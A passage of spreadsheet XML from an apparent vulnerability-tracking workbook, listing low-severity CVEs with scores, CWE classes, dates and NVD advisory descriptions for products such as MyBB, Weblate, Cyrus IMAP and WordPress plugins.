      <c r="K5798" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5798" s="5" t="inlineStr">
        <is>
          <t>The Joli Table Of Contents WordPress plugin before 2.8.1 does not sanitise and escape some of its settings before outputting them in an admin page, which could allow high-privilege users such as administrators to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed, for example in a multisite setup.</t>
        </is>
      </c>
      <c r="M5798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-15694</t>
        </is>
      </c>
    </row>
    <row r="5799">
      <c r="A5799" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5799" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-15695</t>
        </is>
      </c>
      <c r="C5799" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5799" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5799" s="5" t="inlineStr"/>
      <c r="F5799" s="5" t="inlineStr"/>
      <c r="G5799" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5799" s="5" t="inlineStr"/>
      <c r="I5799" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5799" s="5" t="inlineStr"/>
      <c r="K5799" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5799" s="5" t="inlineStr">
        <is>
          <t>The Translate WordPress with GTranslate WordPress plugin before 3.0.10 does not validate one of its settings before the bundled front-end scripts build markup from it, allowing users with a role as high as administrator to store JavaScript that runs in the session of any visitor to the site.</t>
        </is>
      </c>
      <c r="M5799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-15695</t>
        </is>
      </c>
    </row>
    <row r="5800">
      <c r="A5800" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5800" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-52651</t>
        </is>
      </c>
      <c r="C5800" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5800" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5800" s="5" t="inlineStr"/>
      <c r="F5800" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5800" s="5" t="inlineStr"/>
      <c r="H5800" s="5" t="inlineStr"/>
      <c r="I5800" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5800" s="5" t="inlineStr"/>
      <c r="K5800" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5800" s="5" t="inlineStr">
        <is>
          <t>HCL MyXalytics was affected by Improper Input validation Vulnerability. It allow malicious or unexpected data to cause unintended system behaviour or security issues.</t>
        </is>
      </c>
      <c r="M5800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-52651</t>
        </is>
      </c>
    </row>
    <row r="5801">
      <c r="A5801" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5801" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-52652</t>
        </is>
      </c>
      <c r="C5801" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5801" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5801" s="5" t="inlineStr"/>
      <c r="F5801" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5801" s="5" t="inlineStr"/>
      <c r="H5801" s="5" t="inlineStr"/>
      <c r="I5801" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5801" s="5" t="inlineStr"/>
      <c r="K5801" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="L5801" s="5" t="inlineStr">
        <is>
          <t>HCL MyXalytics was affected by Content Spoofing Vulnerability. It may allow an attacker to manipulate displayed content, making it appear as though it originates from a trusted source, potentially leading to phishing or data theft.</t>
        </is>
      </c>
      <c r="M5801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-52652</t>
        </is>
      </c>
    </row>
    <row r="5802">
      <c r="A5802" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5802" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-52657</t>
        </is>
      </c>
      <c r="C5802" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5802" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5802" s="5" t="inlineStr"/>
      <c r="F5802" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5802" s="5" t="inlineStr"/>
      <c r="H5802" s="5" t="inlineStr"/>
      <c r="I5802" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5802" s="5" t="inlineStr"/>
      <c r="K5802" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L5802" s="5" t="inlineStr">
        <is>
          <t>HCL MyXalytics was affected by Potential DOS Vulnerability. It allows users to input data without any restriction on the number of characters which can impact system performance or availability.</t>
        </is>
      </c>
      <c r="M5802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-52657</t>
        </is>
      </c>
    </row>
    <row r="5803">
      <c r="A5803" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33333</t>
        </is>
      </c>
      <c r="C5803" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5803" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5803" s="5" t="inlineStr"/>
      <c r="F5803" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5803" s="5" t="inlineStr"/>
      <c r="H5803" s="5" t="inlineStr"/>
      <c r="I5803" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J5803" s="5" t="inlineStr"/>
      <c r="K5803" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="L5803" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there is sensitive information disclosure in the error messages. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M5803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33333</t>
        </is>
      </c>
    </row>
    <row r="5804">
      <c r="A5804" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45126</t>
        </is>
      </c>
      <c r="C5804" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5804" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5804" s="5" t="inlineStr"/>
      <c r="F5804" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5804" s="5" t="inlineStr"/>
      <c r="H5804" s="5" t="inlineStr"/>
      <c r="I5804" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5804" s="5" t="inlineStr"/>
      <c r="K5804" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5804" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the Admin CP Security Questions module does not validate the anti-CSRF token correctly, allowing same-site attackers to enable or disable registration challenge questions with a specially crafted URL. The controller processes GET requests for the disable and enable actions to modify mybb_questions.active without verifying the my_post_key token attached by the user interface. The uniquely identifying implementation details include admin/modules/config/questions.php. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M5804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45126</t>
        </is>
      </c>
    </row>
    <row r="5805">
      <c r="A5805" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45127</t>
        </is>
      </c>
      <c r="C5805" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5805" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5805" s="5" t="inlineStr"/>
      <c r="F5805" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5805" s="5" t="inlineStr"/>
      <c r="H5805" s="5" t="inlineStr"/>
      <c r="I5805" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5805" s="5" t="inlineStr"/>
      <c r="K5805" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5805" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the ACP Mass Mail module does not validate certain requests correctly, allowing same-site attackers to create draft entries from archived entries by embedding a specially crafted URL. The Resend route in Admin CP, Users &amp; Groups, Mass Mail, Mass Mailing Archive duplicates archived mailing entries into new drafts with mybb_massemails.status set to 0 on GET requests without request forgery protection. The uniquely identifying implementation details include Users &amp; Groups → Mass Mail → Mass Mailing Archive, mybb_massemails.status = 0, and admin/modules/user/mass_mail.php. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M5805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45127</t>
        </is>
      </c>
    </row>
    <row r="5806">
      <c r="A5806" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45128</t>
        </is>
      </c>
      <c r="C5806" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5806" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5806" s="5" t="inlineStr"/>
      <c r="F5806" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5806" s="5" t="inlineStr"/>
      <c r="H5806" s="5" t="inlineStr"/>
      <c r="I5806" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5806" s="5" t="inlineStr"/>
      <c r="K5806" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5806" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the ACP Users View Manager module does not validate requests correctly, allowing same-site attackers to change a victim administrator's default user list view by embedding a specially crafted URL. The Set as Default control named set_default in Admin CP, Users &amp; Groups, Users, View Manager changes the administrator's default view on GET requests without request forgery protection. The uniquely identifying implementation details include Users &amp; Groups → Users → View Manager, and admin/inc/functions_view_manager.php. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M5806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45128</t>
        </is>
      </c>
    </row>
    <row r="5807">
      <c r="A5807" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46460</t>
        </is>
      </c>
      <c r="C5807" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5807" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5807" s="5" t="inlineStr"/>
      <c r="F5807" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5807" s="5" t="inlineStr"/>
      <c r="H5807" s="5" t="inlineStr"/>
      <c r="I5807" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5807" s="5" t="inlineStr"/>
      <c r="K5807" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5807" s="5" t="inlineStr">
        <is>
          <t>Dell PowerScale OneFS, versions 9.5.0.0 through 9.7.1.15, versions 9.8.0.0 through 9.13.1.0, and versions prior to 9.15.0.0, contain an Incorrect Authorization vulnerability. A low privileged adjacent network attacker could potentially exploit this vulnerability, leading to unauthorized modification of system logs.</t>
        </is>
      </c>
      <c r="M5807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46460</t>
        </is>
      </c>
    </row>
    <row r="5808">
      <c r="A5808" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5808" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49895</t>
        </is>
      </c>
      <c r="C5808" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5808" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5808" s="5" t="inlineStr"/>
      <c r="F5808" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5808" s="5" t="inlineStr"/>
      <c r="H5808" s="5" t="inlineStr"/>
      <c r="I5808" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5808" s="5" t="inlineStr"/>
      <c r="K5808" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L5808" s="5" t="inlineStr">
        <is>
          <t>In get_eht_operation_channel_width of ieee802_11_common.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote (proximal/adjacent) information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M5808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49895</t>
        </is>
      </c>
    </row>
    <row r="5809">
      <c r="A5809" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61909</t>
        </is>
      </c>
      <c r="C5809" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5809" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5809" s="5" t="inlineStr"/>
      <c r="F5809" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5809" s="5" t="inlineStr"/>
      <c r="H5809" s="5" t="inlineStr"/>
      <c r="I5809" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5809" s="5" t="inlineStr"/>
      <c r="K5809" s="5" t="inlineStr">
        <is>
          <t>CWE-420</t>
        </is>
      </c>
      <c r="L5809" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Cyrus IMAP before 3.12.4. CalDAV/CardDAV multiget bypasses a per-href ACL. An authenticated DAV user with some shared access to another user's calendar or address book could read even unshared events or contacts by including the target hrefs in a calendar-multiget or addressbook-multiget REPORT.</t>
        </is>
      </c>
      <c r="M5809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61909</t>
        </is>
      </c>
    </row>
    <row r="5810">
      <c r="A5810" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61910</t>
        </is>
      </c>
      <c r="C5810" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5810" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5810" s="5" t="inlineStr"/>
      <c r="F5810" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5810" s="5" t="inlineStr"/>
      <c r="H5810" s="5" t="inlineStr"/>
      <c r="I5810" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5810" s="5" t="inlineStr"/>
      <c r="K5810" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5810" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Cyrus IMAP before 3.12.4. Mailbox/set let a sharee change a special-use role on shared mailboxes. An authenticated user with maySetKeywords on another user's mailbox could change that mailbox's specialuse annotation. This could allow the sharee to change the shared mailbox to perform the archived, snoozed, or other role, which might cause mail mail to be written to the shared mailbox, sharing more content than intended. (This is likely to be an unusual situation, made more unusual because if the target already has an non-shared mailbox with that role, role duplication suppression will prevent the update.)</t>
        </is>
      </c>
      <c r="M5810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61910</t>
        </is>
      </c>
    </row>
    <row r="5811">
      <c r="A5811" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5811" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69904</t>
        </is>
      </c>
      <c r="C5811" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5811" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5811" s="5" t="inlineStr"/>
      <c r="F5811" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G5811" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H5811" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I5811" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5811" s="5" t="inlineStr"/>
      <c r="K5811" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5811" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M5811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69904</t>
        </is>
      </c>
    </row>
    <row r="5812">
      <c r="A5812" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5812" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75726</t>
        </is>
      </c>
      <c r="C5812" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5812" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5812" s="5" t="inlineStr"/>
      <c r="F5812" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5812" s="5" t="inlineStr"/>
      <c r="H5812" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I5812" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5812" s="5" t="inlineStr"/>
      <c r="K5812" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5812" s="5" t="inlineStr">
        <is>
          <t>Adobe Experience Manager is affected by an Improper Input Validation vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and gain unauthorized limited write access. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page.</t>
        </is>
      </c>
      <c r="M5812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75726</t>
        </is>
      </c>
    </row>
    <row r="5813">
      <c r="A5813" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5813" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76816</t>
        </is>
      </c>
      <c r="C5813" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5813" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5813" s="5" t="inlineStr"/>
      <c r="F5813" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5813" s="5" t="inlineStr"/>
      <c r="H5813" s="5" t="inlineStr"/>
      <c r="I5813" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J5813" s="5" t="inlineStr"/>
      <c r="K5813" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-626</t>
        </is>
      </c>
      <c r="L5813" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.137.Final and 4.2.17.Final, MqttEncoder does not validate client identifiers, will topics, usernames, and PUBLISH topic names before encoding, allowing prohibited null bytes in MQTT UTF-8 string fields and potentially causing routing, access-control, or identity mismatches in downstream brokers. The vulnerability is exploitable when an application uses Netty's MQTT encoder to construct messages from user-controlled input. This issue is fixed in versions 4.1.137.Final and 4.2.17.Final.</t>
        </is>
      </c>
      <c r="M5813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76816</t>
        </is>
      </c>
    </row>
    <row r="5814">
      <c r="A5814" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5814" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76960</t>
        </is>
      </c>
      <c r="C5814" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5814" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5814" s="5" t="inlineStr"/>
      <c r="F5814" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5814" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H5814" s="5" t="inlineStr"/>
      <c r="I5814" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5814" s="5" t="inlineStr"/>
      <c r="K5814" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5814"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M5814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76960</t>
        </is>
      </c>
    </row>
    <row r="5815">
      <c r="A5815" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5815" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76961</t>
        </is>
      </c>
      <c r="C5815" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5815" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5815" s="5" t="inlineStr"/>
      <c r="F5815" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5815" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H5815" s="5" t="inlineStr"/>
      <c r="I5815" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5815" s="5" t="inlineStr"/>
      <c r="K5815" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5815"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M5815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76961</t>
        </is>
      </c>
    </row>
    <row r="5816">
      <c r="A5816" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5816" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77351</t>
        </is>
      </c>
      <c r="C5816" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5816" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5816" s="5" t="inlineStr"/>
      <c r="F5816" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5816" s="5" t="inlineStr"/>
      <c r="H5816" s="5" t="inlineStr"/>
      <c r="I5816" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J5816" s="5" t="inlineStr"/>
      <c r="K5816" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5816" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 5.0.0, Wallos lets any authenticated user store an arbitrary SMTP host — including private and cloud-metadata IP addresses — in their personal email notification settings, with no server-side SSRF validation. When the scheduled notification cron job runs, it passes the stored host directly to PHPMailer, causing the Wallos server to open an outbound TCP connection to whatever address the attacker specified. This gives a low-privileged attacker a reliable mechanism to probe internal network services from the server's perspective. This issue has been patched in version 5.0.0.</t>
        </is>
      </c>
      <c r="M5816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77351</t>
        </is>
      </c>
    </row>
    <row r="5817">
      <c r="A5817" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5817" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77508</t>
        </is>
      </c>
      <c r="C5817" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5817" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5817" s="5" t="inlineStr"/>
      <c r="F5817" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5817" s="5" t="inlineStr"/>
      <c r="H5817" s="5" t="inlineStr"/>
      <c r="I5817" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J5817" s="5" t="inlineStr"/>
      <c r="K5817" s="5" t="inlineStr">
        <is>
          <t>CWE-302, CWE-841</t>
        </is>
      </c>
      <c r="L5817" s="5" t="inlineStr">
        <is>
          <t>Weblate is a web based localization tool. Prior to 2026.8, an authenticated user can change the account's primary email through PUT or PATCH requests to /api/users/{username}/ without verifying the new address, allowing a later team invitation for that address to be accepted without access to the intended recipient's mailbox. This issue is fixed in version 2026.8.</t>
        </is>
      </c>
      <c r="M5817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77508</t>
        </is>
      </c>
    </row>
    <row r="5818">
      <c r="A5818" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5818" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77573</t>
        </is>
      </c>
      <c r="C5818" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5818" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5818" s="5" t="inlineStr"/>
      <c r="F5818" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5818" s="5" t="inlineStr"/>
      <c r="H5818" s="5" t="inlineStr"/>
      <c r="I5818" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J5818" s="5" t="inlineStr"/>
      <c r="K5818" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-918</t>
        </is>
      </c>
      <c r="L5818" s="5" t="inlineStr">
        <is>
          <t>Weblate is a web-based continuous localization platform used to manage software translations. In versions prior to 2026.8, a user permitted to manage component repository URLs can perform server-side request forgery against internal services through DNS rebinding during VCS operations. Weblate validates the hostname's first DNS resolution, but the external VCS clients that later connect perform a separate DNS lookup, so an attacker-controlled hostname that initially resolves to a public address can be re-pointed to an internal or private address before the connection is made. By triggering a clone, fetch, push, or similar remote operation, the attacker can cause Weblate to reach internal VCS-compatible services and potentially expose private repository contents. Installations that permit untrusted repository hostnames while using VCS_RESTRICT_PRIVATE=True are affected. This issue is fixed in version 2026.8.</t>
        </is>
      </c>
      <c r="M5818" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77573</t>
        </is>
      </c>
    </row>
    <row r="5819">
      <c r="A5819" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5819" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81846</t>
        </is>
      </c>
      <c r="C5819" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5819" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5819" s="5" t="inlineStr"/>
      <c r="F5819" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5819" s="5" t="inlineStr"/>
      <c r="H5819" s="5" t="inlineStr"/>
      <c r="I5819" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J5819" s="5" t="inlineStr"/>
      <c r="K5819" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5819" s="5" t="inlineStr">
        <is>
          <t>An authorization bypass in the runZero Platform MCP service has been resolved in version 5.1.260826.0. This issue is an instance of CWE-639: Authorization Bypass Through User-Controlled Key and has an estimated CVSS score of CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N (3.5 Low).</t>
        </is>
      </c>
      <c r="M5819" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81846</t>
        </is>
      </c>
    </row>
    <row r="5820">
      <c r="A5820" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5820" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86491</t>
        </is>
      </c>
      <c r="C5820" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5820" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5820" s="5" t="inlineStr"/>
      <c r="F5820" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5820" s="5" t="inlineStr"/>
      <c r="H5820" s="5" t="inlineStr"/>
      <c r="I5820" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
